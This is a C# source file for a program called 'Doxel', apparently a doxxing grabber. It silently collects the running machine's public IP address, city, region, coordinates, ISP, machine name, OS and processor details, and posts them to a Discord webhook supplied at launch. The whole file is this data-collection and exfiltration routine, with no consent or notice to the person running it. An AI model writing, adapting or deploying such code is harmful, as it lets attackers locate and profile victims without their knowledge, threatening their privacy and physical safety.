using DiscordWebhook;
using System;
using System.Net;

namespace Doxel
{
    internal class Program
    {
        static void Main(string[] args)
        {
            WebClient wc = new WebClient();
            DateTime ct = DateTime.Now;

            string ip = null;
            string pcName = Environment.MachineName;
            string currentTime = ct.ToString();

            string rawLns = null;
            string rawJSON = null;

            string[] parsedLns = null;
            string thumbURL = "https://cdn.discordapp.com/attachments/1038839210238546030/1186079457220501534/OTS8PW9.png";
            int statusColour = 0x3BAE58;

            try
            {
                ip = wc.DownloadString("http://ipinfo.io/ip");
                rawLns = wc.DownloadString("http://ip-api.com/line/" + ip);
                rawJSON = wc.DownloadString("http://ip-api.com/json/" + ip);
                parsedLns = rawLns.Split('\n');
            }
            catch (Exception ex)
            {
                ip = "Error: "+ex.Message.ToString();
                rawJSON = "Error"+ex.Message.ToString();
                thumbURL = "https://cdn.discordapp.com/attachments/1038839210238546030/1186082384802746368/XMe24dH.png";
                statusColour = 0xFBBC05;
            }

            Webhook webhook = new Webhook(args[0]);
            WebhookObject msg = new WebhookObject()
            {
                embeds = new Embed[]
                {
                    new Embed()
                    {
                        thumbnail = new Thumbnail()
                        {
                            url = thumbURL
                        },
                        fields = new Field[]
                        {
                            new Field()
                            {
                                name = "Hardware",
                                value = "Machine Name: `" + pcName + "`\nOS Version: `" + Environment.OSVersion.ToString() + "`\nProcessors: `" + Environment.ProcessorCount.ToString() + "`\nArchitecture: `" + Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE") + "`\nProcessor: `" + Environment.GetEnvironmentVariable("PROCESSOR_IDENTIFIER") + "`"
                            },
                            new Field()
                            {
                                name = "Network - Parsed",
                                value = "IP Address: ```\n" + ip + "\n```\nCountry: `" + parsedLns[1] + "`\nRegion: `" + parsedLns[4] + "`\nCity: `" + parsedLns[5] + "`\nLocation: `" + parsedLns[7] + ", " + parsedLns[8] + "`" + "\nISP: `" + parsedLns[10] + "`",
                            },
                            new Field()
                            {
                                name = "Network - Raw",
                                value = "```json\n"+rawJSON+"```\n"
                            }
                        },
                        footer = new Footer()
                        {
                            text = "Generated by Doxel - " + currentTime,
                            icon_url = "https://cdn.discordapp.com/attachments/1038839210238546030/1186074941125300324/8Ab8kke.png"
                        },
                        color = statusColour
                    }
                },
                username = "Doxel",
            };

            webhook.PostData(msg);
        }
    }
}